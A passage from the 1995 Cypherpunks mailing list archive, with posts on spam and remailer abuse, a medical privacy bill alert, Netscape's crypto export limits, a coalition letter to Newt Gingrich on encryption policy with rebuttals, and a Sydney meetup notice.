> from the Internet.  Compuserve sysops are attempting to block the spaming
> but are finding it difficult because the advertiser is coming in via
> different routes.  They are also attempting to stop them using the court
> system.
> 
>    The advertiser, according to the Compuserve sysop, threatened a
> mail-bombing if Compuserve tried to block them!!!  This would be a just
> cause to call in the CSOF (Cypherpunk Soldier of Fortune) for a "measured
> response".

Yes, I've noticed these as well.  One troubling thing I noted with one
such spam-handed "attack" was the use of a group of internal email
addresses (in the sense that we don't advertise these addresses) as
addressees for a message that had an analog sent to www-buyinfo and
some other web related addresses.  This seems to indicate a way of
organizing lists into sets based on location/topic, but doesn't
include all other potential addressees in the same domain or
organization.

I guess it was only a matter of time before someone wrote
sophisticated spamming servers that somehow capture/analyze log files,
or is this just some idiot front end that lets ad-happy fools spam
with a smaller apparent footprint?

By the way... One reply I got from an ISP re: one of these drive by
spammings indicated that they were charging the idiot for disobeying
policy.  I've started suggesting to ISPs that they dis-user and charge
the offender (in case they haven't thought of this yet).  If non-spam
policies were more widely used, and these idiots loose their
email/access and a few hundred dollars in charges for wasting ISP
admin time, perhaps this trend won't continue.

-- 
Dave Dittrich                  Client Services, Computing & Communications
dittrich@cac.washington.edu    University of Washington

<a href="http://www.washington.edu/People/dad/">
Dave Dittrich / dittrich@cac.washington.edu</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JWRCLUM@aol.com
Date: Tue, 21 Nov 1995 04:49:03 +0800
To: cypherpunks@toad.com
Subject: Privacy Rights Alert
Message-ID: <951120150426_28561669@emout06.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


    From:  American Civil Liberties Union of Massachusetts
           jwrclum@aol.com
 
    Re:    Privacy Rights Alert
    
    Date: November 20, 1995
    
    c 1995 ACLUMA
    
         We at the American Civil Liberties Union of Massachusetts want to
alert you to the fact that the right to medical privacy of all Americans is
imperiled by a bill just introduced in the U.S. Congress.  This bill, which
is claimed to be a  "Medical Records Confidentiality Act,"  in reality may
turn out to be profoundly destructive of your right to privacy. 
         Although Part I does contain certain aspects which     could help
privacy, Part II undercuts the very fabric of patient- doctor
confidentiality.  
         First, it preempts many state law and common law  protections which
currently exist.  
         Second, it pushes the further computerization of medical records,
and will bring about the creation of "Health Information Services"  ---
corporate entities which would receive, process, and serve as libraries for
actual on-line medical records forwarded from hospitals, clinics, and
individual doctors.  It appears that this will take place without any
requirement for individual patients' authorization or consent.
         As we all know, computerized data bases are not immune     from
being accessed by both unauthorized  "outsiders"  and   unauthorized
"insiders."   Centralization of data storage,   especially in electronic
form, simplifies its being accessed.
         But aside from that, the bill would actually authorize
access to the medical records in these data bases by a host     of government
and non-government entities.  Each of our medical records would thus become
part of a computerized "lending library"  --- an internet of medical records.
         For example, the bill would permit release of your medical records
from "Health Information Services" (the on-line data base holders) and
"Health Information 'Trustees'" (providers, hospitals, health plans,
employers, insurers, and health oversight agencies) to the following (among
others):
              - Release to researchers (along with your medical
history, it is possible that identifying
                information including your name, address, and 
                phone number would be sent).
              - Nearly-automatic release, to the opposing party 
                in a lawsuit, of your entire medical history, if
                your health, physical or mental, has been raised 
                by you as an issue in that lawsuit.
              - Release to law-enforcement authorities under
certain circumstances.
              - Release to Public Health Agencies under certain
                circumstances.
              - Release based on Judicial Warrant --- you would
be notified by mail within 30 days after                         execution of
the warrant (90 days or more with 
                the government's ex parte option).
              - Release based on Judicial Subpoena, Grand Jury
Subpoena, or Administrative Agency (e.g. Social                  Security)
Subpoena --- you would be notified on        or before the date of its
execution (or within
                90 days thereafter [or longer] with the
government's ex parte option).
                          -A special variant of this, where the
identity of the patient is "unknown," would                      allow the
search of records (plural) in           order to identify the person being
sought.        [In essence, this would allow "fishing"   expeditions, using a
computerized net, into
                      the private lives of Americans.]

         In some of these situations, you, the patient, will
only be informed after the records have been released.
         You may, in some circumstances, have the legal right to
"attempt to quash" the subpoena (etc.) by seeking a court's
intervention.  However, the standard by which the court is
to reach a decision on this will be mandated by this bill to
be a consideration of whether the government's interest in obtaining the
information outweighs the privacy interest of the individual.
         We would encourage you to pull up a copy of the actual
bill and view it yourself.  This can be done through the
Library of Congress internet site at http:\\thomas.loc.gov
(104th Congress,  Senate bill number  S 1360 ).
         Alternatively, a hard copy by mail can be requested
from the U.S. Senate Documents Room, by faxing to 202-228-2815 
a note containing the bill number and your mailing address.
         All our voices need to be heard in order to help make
certain that this bill is not passed by Congress.  
         Possible actions include: (1) Letters to your Senators and
congresspersons, and to the House and Senate leadership.
(2) Letters to local newspapers and other media.  (3) Forwarding the contents
of this message to places where you feel it will be
of interest and have impact.
         This document may be re-distributed freely, provided it remains in
its entirety.
         If you value your right to privacy, the time to act is now....  
    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Tue, 21 Nov 1995 07:12:26 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
Message-ID: <m0tHeeN-0008zTC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>On September 27, Jeff Weinstein of Netscape (and others) wrote:
>
>> > > ... would be nice if we could get 128 bit keys, though ... (hint,
>> > > hint).
>> > 
>> > We are working this issue with the government.  As soon as we can
>> > make it available for download we will.
>
>> In other words, we will never see it in our lifetimes -- the
>> bureaucreeps aren't known for promoting the spread of strong crypto.
>
>>>  Where did I imply that if the govt. ignored us or said no that we
>>>  would meekly go away with tail between legs?


Here's a question:  Why can't Netscape be released WITHIN THE US with 128
bit keys?  Admittedly, it would probably...uh...escape within a few hours,
but that's no worse than what other cryptosystems (best-known example, PGP)
have done.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 21 Nov 1995 06:29:22 +0800
To: cypherpunks@toad.com
Subject: "Dear Newt" Letter...
Message-ID: <v02120d0facd69dc27ec3@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



My, *this* looks interesting...


Cheers,
Bob Hettinga



--- begin forwarded text

Date: 20 Nov 1995 11:21:01 -0800
Subject: please fwd to cpunks if you
To: "Bob Hettinga" <RAH@shipwright.com>

     The Ad Hoc Taxpayer Coalition for Computer Privacy

                     November 8, 1995

The Honorable Newt Gingrich
Speaker of the House of Representatives
H-232 The Capitol
Washington, DC 20515-6502

Dear Mr. Speaker:

 We are writing to express serious concerns about the
Administration's efforts to continue to restrict the ability
of computer users at home and abroad to protect their personal
and private information over electronic networks through the
use of encryption technology. The Administration seems
determined to ensure government surveillance of all electronic
information and communications. It began with President
Clinton's "Clipper Chip," but has not stopped.

 Consumers aren't happy with these proposals, and neither is
the business community nor civil libertarians. In fact, it's
hard to find anyone supportive outside the Administration
except for the few that would benefit from the
Administration's "proposed relaxation" of the nation's export
policy.

 The Administration refuses to let American computer hardware
and software companies sell products with good encryption
worldwide unless the U.S. Government is guaranteed access to a
key that unlocks that information. The Administration is
trying to leverage these companies' need to export -- they
derive more than half their earnings from sales abroad -- and
desire to develop a single product worldwide, to force them to
include a feature in products they sell in the U.S. and abroad
that will allow government access. Administration officials
also have said that if American companies do not "voluntarily"
include such a feature, then they will seek legislation making
such a feature mandatory.

 The Administration's approach is the wrong policy for today's
marketplace.

 It's anti-consumer. Computer users will not entrust their
sensitive information to computer networks unless its security
and privacy are assured. Without good privacy protection,
there simply will not be a Global Information Infrastructure
-- and America won't be in the lead.

 It's anti-marketplace. There is no consumer demand for
encryption products that give the government easy access. The
Administration has come forward with a typical big-government
approach -- a government designed solution for a government
problem. This completely overlooks the realities of a
free-market.

 It is anti-American business. The Administration's current
policies are seriously harming the continued competitiveness
of one of our fastest growing and most successful industries
-- the computer hardware and software industry. Computer users
are demanding good encryption but American companies are not
allowed to supply it. Yet there are hundreds of foreign
encryption products manufactured and encryption programs are
widely available on the Internet.

 Finally, it is anti-progress. Wishing that there was no
encryption available will not make it so. The technology is
widely understood and available -- you can't put this genie
basic in the bottle. Government policies should not encumber
the American computing industry as it leads the world
technology revolution.

 We strongly urge you to oppose attempts to limit the ability
of Americans to use whatever encryption they wish and to
support the immediate relaxation of harmful export controls on
American products and programs with encryption features.


     The Ad Hoc Taxpayer Coalition for Computer Privacy

Americans for Tax Reform
Association of Concerned Taxpayers
Competitive Enterprise Institute
Citizens for a Sound Economy
The Business Leadership Council
The Small Business Survival Committee
Citizens Against a National Sales Tax/VAT

Virginia Postrel, Editor, Reason magazine
Sheldon Richman, Senior Editor, The Cato Institute
Tanya Metaksa, Executive Director, Institute for Legislative
 Action, National Rifle Association
Kellyanne Fitzpatrick, The Polling Company
Donna Matias, Institute for Justice

=+=+=+=+
This information is provided as a service of the National Rifle
Association Institute for Legislative Action, Fairfax, VA.

This and other information on the Second Amendment and the NRA is
available at any of the following URL's: http://WWW.NRA.Org,
gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
mailto:LISTPROC@NRA.Org (Send the word help as the body of a message)

Information may also be obtained by connecting directly to the
NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg_Rose@sibelius.sydney.sterling.com (Greg ROSE)
Date: Mon, 20 Nov 1995 14:46:07 +0800
To: lucyc@sw.oz.au
Subject: Cypherpunks in Sydney (Australia) Meeting
Message-ID: <9511200554.AA49910@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

I mentioned some time ago that if there was
sufficient interest I'd organise a Sydney
Cypherpunks get-together. It was supposed to be
in mid-November :-(, but you can't have
everything.

In the absence of consultation with anyone, I've
booked a small suburban chinese restaurant for the
venue. This seems in keeping with other
cypherpunks meetings (not that I've ever been to
one...)

Date:   Wednesday December 6th.
Time:   7:00pm
Place:  Mee Ton Restaurant
        139 Concord Road
        Concord

The restaurant is easy to get to, only 20 minutes
by car from the city and easy to park.  If
driving out from the city along Paramatta Road,
you just have to be careful not to turn onto the
freeway. Concord Road is *second* and crosses
back over the freeway. The restaurant is about
400 metres north of Paramatta Road, on the
eastern side. It's also only a short walk from
North Strathfield station. If enough people are
using Public transport I can organise a pickup
from (the main) Strathfield station (a little
more convenient in terms of frequency of
trains).

I'm anticipating maybe ten-fifteen people. They
have a nice, light banquet menu for $12 per head,
everything included except alcohol.

RSVP, please, by Friday the 1st, and tell me whether
you are interested in a PGP key signing at the
same time.

I will post this to aus.org.auug, sage-au-nsw,
sci.crypt. Any other suggestions appreciated, and
don't hesitate to pass around the details.

- -- 
Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMLAX/6RQkCwJ0+ZNAQFU1AP/Y4d6RUieAKMoz4MJCeX5OXyhCNfTfrMp
/szVqe2ICn+9F+T+Ggad1XKSsO3NBk1Lmo478NUYHuCDuMODSgM0YRxRo7SuEd9d
joFtpUIAjBAs+e0beO7DI934XFSvDQini+YT2NxDtUtEM0c4fVh96oQyJguSnWP2
Mx8ZubrzoDs=
=R65K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 06:45:58 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: No Privacy Right in Indonesia ?
In-Reply-To: <Pine.BSD.3.91.951117175152.9898M-100000@ahcbsd1.ovnet.com>
Message-ID: <9511202205.AA28370@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>An 11 17 95 Reuter Information Service newsstory headlined 
> 
>     Politics, not sex, is Indonesian Internet's concern 

Absolutely. We designed it this way. One of the key ideas was to provide such 
governments with a choice between having their power structures erroded by 
democratic influences or to sink into technological obsolecence.

The US govt. stands to do best from all this. Democratic govt.s in general
will win. Those that will lose are those which attempt to stamp a political 
or cultural orthodoxy on their people. 

Communication is the greatest threat to tyranny. That is why all tyrannies 
must control communications. It is worth considering that when Stalin died
he was considered the saviour of the country, even by those who should have
known the truth. It was only afte Kruschev's speech to the closed session
that the truth became known inside the party. Note that even those who were
the victims of the oppression had believed that Stalin was a hero. "It is
a mistake", "if only Stalin knew" yet Stalin knew all along and this was 
obvious to the outside observer.

East Germany fell when the size of the defections became known within the 
country. It was clear that the regime was bankrupt and that people were
voting with their feet. 

Cuba will not be brought down by sanctions, that policy has failed for
thirty years and shows no signs of achieving anything. On the other hand
the communist structures would probably be sewpt away in months were the US
to admit defeat (thus acknowledging the Cuban peoples "victory") and start 
package tourist flights. Once it was in the interests of the nomenclatura
to become capitalists they would change.

South Africa was not brought down by sanctions per se, they had an
effect because they demonstrated that the Western world did not accept
the appartheid principles. South Africa tried to see itself as a part
of the West and that was crucial to the apartheid mindset. Sanctions
demonstrated that South Africa was not considered a friend or aly. 


		Phill
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Tue, 21 Nov 1995 09:49:27 +0800
To: corey@netscape.com (Corey Bridges)
Subject: Re: Spam the Sign!
In-Reply-To: <199511202259.OAA11521@netscape.com>
Message-ID: <199511210121.RAA02291@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hm. Well, if you think spamming us will help convince the gov't to export
> strong crypto, go crazy. (Heck, I don't mind--it makes my job more secure.)
> 
> And yes, we HAVE enjoyed the message "Strong Crypto NOW" that's been
> scrolling for the last 3 hours.
> 
> Corey Bridges
> Security Scribe
> Netscape Communications Corporation
> 415-528-2978
 
I'm not sure what NWBR's point is, but the original thread he's quoting
was about making the 'evaluation' copies available with 128bit RC4 to
U.S. users.  Jeff Weinstein said that he thought that this was a good idea,
and would see about making it available via an export-controlled ftp
server "once we get government approval".  I was involved in that thread,
since as a Linux user, I can't buy a supported copy, and therefore can't
take advantage of the strong crypto features of the Navigator.

So I would guess that he's spamming YOU to convince YOU to make strong
crypto available.

And as far as needing government approval, I noticed that Sameer has an
export controlled ftp server at c2.org.  Maybe he could tell us what is
necessary to setup such an animal. 

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 21 Nov 1995 07:08:24 +0800
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202228.AA16586@all.net>
MIME-Version: 1.0
Content-Type: text


*** FLAME ON ***

Quoted in complete context for your protection:
> --- begin forwarded text
> 
> Date: 20 Nov 1995 11:21:01 -0800
> Subject: please fwd to cpunks if you
> To: "Bob Hettinga" <RAH@shipwright.com>
> 
>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
>                      November 8, 1995
> 
> The Honorable Newt Gingrich
> Speaker of the House of Representatives
> H-232 The Capitol
> Washington, DC 20515-6502
> 
> Dear Mr. Speaker:
> 
>  We are writing to express serious concerns about the
> Administration's efforts to continue to restrict the ability
> of computer users at home and abroad to protect their personal
> and private information over electronic networks through the
> use of encryption technology. The Administration seems
> determined to ensure government surveillance of all electronic
> information and communications. It began with President
> Clinton's "Clipper Chip," but has not stopped.

Whoa!  Clinton didn't start the Clipper initiative.  Try Ragan/Bush!

Administration's efforts - hardly.  They inherited and mostly agreed

computer users at home and abroad - not according to what I've seen and
read - they want to stop export of good crypto, not internal use thereof.
It's the FBI that wants to read all your email and tap your phones.  The
administration is just going along as far as I can tell, and so is Newt.

>  Consumers aren't happy with these proposals, and neither is
> the business community nor civil libertarians. In fact, it's
> hard to find anyone supportive outside the Administration
> except for the few that would benefit from the
> Administration's "proposed relaxation" of the nation's export
> policy.

The vast majority of consumers don't care as far as I can tell.  Same
with most of the small business community (the vast majority of the
whole business community in the US).

>  The Administration refuses to let American computer hardware
> and software companies sell products with good encryption
> worldwide unless the U.S. Government is guaranteed access to a
> key that unlocks that information.

Dead flat wrong.  What is required is an export license, and they are
attainable.

> The Administration is
> trying to leverage these companies' need to export -- they
> derive more than half their earnings from sales abroad -- and
> desire to develop a single product worldwide, to force them to
> include a feature in products they sell in the U.S. and abroad
> that will allow government access.

What's your basis for this conclusion? They have not said so as far as I
can tell. 

> Administration officials
> also have said that if American companies do not "voluntarily"
> include such a feature, then they will seek legislation making
> such a feature mandatory.

Which ones said exactly what?

>  The Administration's approach is the wrong policy for today's
> marketplace.

Finally something I agree on.

>  It's anti-consumer. Computer users will not entrust their
> sensitive information to computer networks unless its security
> and privacy are assured. Without good privacy protection,
> there simply will not be a Global Information Infrastructure
> -- and America won't be in the lead.

I don't think most consumers care at all unless and until it directly
affects them in a way they can see and understand the connection with. 
There already is a GII, America is in the lead in some areas, and the
privacy issue is not a very important one judging by the vast majority
of users who use it regardless of and in ignorance of privacy protection.

>  It's anti-marketplace. There is no consumer demand for
> encryption products that give the government easy access. The
> Administration has come forward with a typical big-government
> approach -- a government designed solution for a government
> problem. This completely overlooks the realities of a
> free-market.

There is almost no consumer demand for encryption.  The demand that
exists is primarily business and government, and the government side
seems to think Clipper is a good idea.

>  It is anti-American business. The Administration's current
> policies are seriously harming the continued competitiveness
> of one of our fastest growing and most successful industries
> -- the computer hardware and software industry. Computer users
> are demanding good encryption but American companies are not
> allowed to supply it. Yet there are hundreds of foreign
> encryption products manufactured and encryption programs are
> widely available on the Internet.

It's not as good for American business as it could be, but Clipper might
be very good for American businesses currently being attacked by foreign
interests.  These hundred of foreign encryption products may contain the
same sorts of holes you fear in US products.  Your proposal might be
even worse for the US. 

>  Finally, it is anti-progress. Wishing that there was no
> encryption available will not make it so. The technology is
> widely understood and available -- you can't put this genie
> basic in the bottle. Government policies should not encumber
> the American computing industry as it leads the world
> technology revolution.

History does not agree with you.  Progress has not histoprically been
generated by the availability of encryption.  It may be in the future,
but for now your claim seems unsupported to me.

>  We strongly urge you to oppose attempts to limit the ability
> of Americans to use whatever encryption they wish and to
> support the immediate relaxation of harmful export controls on
> American products and programs with encryption features.

I believe Newt is in favor of clipper and national defense and law
enforcement, all of which strongly support CLipper, wire tapping, etc. 

>      The Ad Hoc Taxpayer Coalition for Computer Privacy
> 
> Americans for Tax Reform
> Association of Concerned Taxpayers
> Competitive Enterprise Institute
> Citizens for a Sound Economy
> The Business Leadership Council
> The Small Business Survival Committee
> Citizens Against a National Sales Tax/VAT
> 
> Virginia Postrel, Editor, Reason magazine
> Sheldon Richman, Senior Editor, The Cato Institute
> Tanya Metaksa, Executive Director, Institute for Legislative
>  Action, National Rifle Association
> Kellyanne Fitzpatrick, The Polling Company
> Donna Matias, Institute for Justice
> 
> =+=+=+=+
> This information is provided as a service of the National Rifle
> Association Institute for Legislative Action, Fairfax, VA.
> 
> This and other information on the Second Amendment and the NRA is
> available at any of the following URL's: http://WWW.NRA.Org,
> gopher://GOPHER.NRA.Org, wais://WAIS.NRA.Org, ftp://FTP.NRA.Org,
> mailto:LISTPROC@NRA.Org (Send the word help as the body of a message)
> 
> Information may also be obtained by connecting directly to the
> NRA-ILA GUN-TALK Bulletin Board System at (703) 934-2121.
> 
> --- end forwarded text
> 
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
> "Reality is not optional." --Thomas Sowell
> The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
> >>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<

If the NRA has all that cash, why don't they support a much better
letter to Newt that is well supported by facts and has enough punch to
really sway him?

-- 
-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Tue, 21 Nov 1995 10:03:09 +0800
To: jsimmons@goblin.punk.net (Jeff Simmons)
Subject: Re: Spam the Sign!
In-Reply-To: <199511210121.RAA02291@goblin.punk.net>
Message-ID: <199511210130.RAA26710@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> And as far as needing government approval, I noticed that Sameer has an
> export controlled ftp server at c2.org.  Maybe he could tell us what is
> necessary to setup such an animal. 
> 
> -- 

	I do what RSADSI does with ftp.rsa.com. It requires a cronjob
and sed. I didn't get the NSA to approve it, but I figure if it's good
enough for RSADSI it's good enough for me.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Tue, 21 Nov 1995 07:41:42 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <v02120d0facd69dc27ec3@[199.0.65.105]>
Message-ID: <9511202245.AA28548@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



Hmm, not sure that it gets us anywhere. The Republicans seem to be even
more keen on wiretap and anti-privacy legislation than the Democrats.
Its called "being tough on crime".

After the airplane seat incident I don't see Newt in the running for 
President so it probably misses the mark. He might slip in a rider on
a bill but if you look at who gets that sort of treatment it correlates
very well with donations, silicon valley seems to be backing Clinton
walet wise.

I would not expect Bob Dole to be resisting pressure from the NSA on this
one more forcefully than Clinton (which let us be clear ain't very
forcefully at all).

I thought the quality of writing rather poor, the points are made in 
polemic, partisan terms which can be made in non-partisan terms. If I
were Newt this letter would say to me "we will vote for you anyway", so
why should Newt bother to pander? The ad hoc ginger groups listed are
a bit odd, the authors are associated with much better known (if
fruitcake) groups.


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 10:16:33 +0800
To: remailer-operators@c2.org
Subject: Re:  remailer abuse
Message-ID: <199511210154.RAA10532@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Greg Broiles <greg@ideath.goldenbear.com>
> I think adopting a submissive or apologetic stance with respect to the 
> operation of a remailer is a mistake. What we do is protected by the First
> amendment, supports a 200+ year tradition of anonymous political speech in
> America, provides a valuable service to a worldwide community, and can help
> avoid the very abuse they are accused of facilitating.

The problem is that the time when someone complains about the remailer is
exactly when they have received some obnoxious message.  This is often
their first exposure to the idea of anonymous remailers.  Such people are
the last ones who are going to be receptive or interested in hearing a
lecture about how remailers are protecting the First Amendment.  I
generally do my best to avoid getting into a debate with these people.  I
tell them I have added them to the block list, and usually that is the
end of it.

So while I think Greg's approach is fine as part of an intellectual
debate over the pros and cons of anonymity, it does not address the most
frequent complaints I see as a remailer operator.  I hope that over time
more people will become exposed to the idea of remailers and anonymity
other than in the form of some annoying anonymous message.  Then I think
they will be better able to deal with it when they do get some problem
mail.

> The child who was the
> target of the "Mr. Pedophile" message(s) should have been taught how to use
> remailers and how to maintain his privacy on the net so that, if he really
> is the victim of some sort of random child stalker, it won't happen again.

That message was not posted to Cypherpunks.  It asked in some graphic
detail whether this boy engaged in sexual relations with his parents.
However, the mother was surprisingly calm about it, and simply asked to
be blocked.  The fact that she knew about blocking gave me the
impression she was remailer-savvy, and as I wrote above this seems to
make a big difference.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rwizard@mindspring.com
Date: Tue, 21 Nov 1995 07:40:22 +0800
To: cypherpunks@toad.com
Subject: Re: "Dear Newt" Letter...
Message-ID: <199511202232.RAA28111@borg.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:38 PM 11/20/95 -0500, Robert Hettinga wrote:
>
>My, *this* looks interesting...
>
>
>Cheers,
>Bob Hettinga
...
>Dear Mr. Speaker:
>
> We are writing to express serious concerns about the
>Administration's efforts to continue to restrict the ability
>of computer users at home and abroad to protect their personal
>and private information over electronic networks through the
>use of encryption technology. The Administration seems
...

As a constituent and campaign volunteer of Mr. Newt, I think
I will drop a hard copy of this off at his office along with a
healthy dose of *my* views !

Thanks for posting it. 

rwizard@mindspring.com
=================================================
"The Internet is already full - Go Away !"
=================================================
-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzChH30AAAEEAL4nhMMmeqVZXx2UYZgyZfjgm+oVkbLkVhgr7Z8rBPWd1FwX
wv+vQlX7smRbYF+FymeUKlWiKl8hhkueo5iObyek5C32a5NP0snYQYJDfwn9UE6P
hJGBpYcjiKU8XzUXfpfAC95FGkCqrLCp1kfDhLpqJChUK1GN8Va+auujevB9AAUT
tCVSYW5keSBXaWxzb24gPHJ3aXphcmRAbWluZHNwcmluZy5jb20+
=KccN
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMKl1wVa+auujevB9AQGJJwQAs9Y13pi2Rq5vFKc9RRIfed7Qkx63RFpz
J1AhkBLE+HEixfjhx3WEmg5hAloae8N2N7/gpPXs3i/TcOQ/XMXtd9L4SSlGieIJ
FrJDF6aktnHoBetKMsaRIFtIC0rXYZCMLktYjTXICPDwZMKWnWy9M5vGYNApS2Rz
DKcZp5UWIIA=
=ZmFv
-----END PGP SIGNATURE-----

----Begin Geek Code---
GAT d- s+:+ a+ C++++ UH++++L++++ P+ L++ E--- W+++ N+ K- w++++ O-- M-- V
PS--- PE+++ Y++ PGP++
t+++ 5+++ X++ !R tv- b+ DI+++ D+ G-- e* h---- r+++ y++++ 
---End Geek Code---






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 21 Nov 1995 08:56:30 +0800
To: hallam@w3.org
Subject: Re: "Dear Newt" Letter...
In-Reply-To: <9511202245.AA28548@zorch.w3.org>
Message-ID: <199511210028.TAA15346@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@w3.org writes:
> Hmm, not sure that it gets us anywhere. The Republicans seem to be even
> more keen on wiretap and anti-privacy legislation than the Democrats.
> Its called "being tough on crime".

Er, Newt was the one who railed against the Exon censorship bill, and
who's said in public that clipper is unrealistic.

Anyway, there is no observable difference between Republicans and
Democrats on the issue of wiretapping -- most statements that
Republicans are worse are based on wishful thinking by Democratic
sympathizers.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 21 Nov 1995 08:58:54 +0800
To: cypherpunks@toad.com
Subject: Pix Lox
Message-ID: <199511210034.TAA15743@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Bill Gates in "The Road Ahead":

      A complete failure of the information highway is worth
      worrying about. Because the system will be thoroughly
      decentralized, any single outage is unlikely to have a
      widespread effect. If an individual server fails, it
      will be replaced and restored. But the system could be
      susceptible to assault. As the system becomes more
      important, we will have to design in more redundancy.
      One area of vulnerability is the system's reliance on
      cryptography -- the mathematical locks that keep
      information safe.

   Excerpted in Newsweek, November 27, pp. 67-68.

   Rubberneck the roadwreck with Steven Levy in "Bill's New
   Vision."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 21 Nov 1995 09:27:16 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security  [NOISE]
In-Reply-To: <QQzqrd08104.199511201318@tenebrous.uu.net>
Message-ID: <gs5VeD1w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Joseph Malcolm <jmalcolm@alter.net> writes:
> Dimitri Vulis writes:
> >m5@dev.tivoli.com (Mike McNally) writes:
> >> Frederick B. Cohen writes:
> >>  > This is baloney.  When you work for Netscape or Sun and speak about you
> >>  > company's products, you are representing the company whether you
> >>  > disclaim it or not.
> >>
> >> Baloney.
> >
> >Fred is right. I used to work for Goldman Sachs & their internet usage polic
> >stated that when you write to Internet or Usenet from a GS account, it will
> >reflect on the firm no matter how you disclaim it.
>
> Dr. Cohen is I believe maintaining it doesn't matter where you write
> from. Note that the Sun employee's message that sparked this was sent
> from a Netcom account.

If that's what Dr. Fred said, then I strongly disagree. (Sorry, I haven't
been following what Dr. Fred said very closely. Can you blame me? :)

Btw, Goldman has a very reasonable Internet use policy that encourages
employees to get accounts on commercial internet providers.

Btw^2, didn't Sun fire someone a couple of years ago for posting a homophobic
joke to Usenet?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 Nov 1995 12:55:56 +0800
To: cypherpunks@toad.com
Subject: Cyberpunk handbook
Message-ID: <199511210436.UAA26114@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


You Bay Area people probably know all about this already, but I was
browsing through the local bookstore yesterday and saw Eric Hughes,
Cypherpunks co-founder, on the cover of the "Cyberpunk [sic] Handbook",
a slim satirical volume by the Mondo 2000 people.  The book has more
attitude than information, though.

Hal




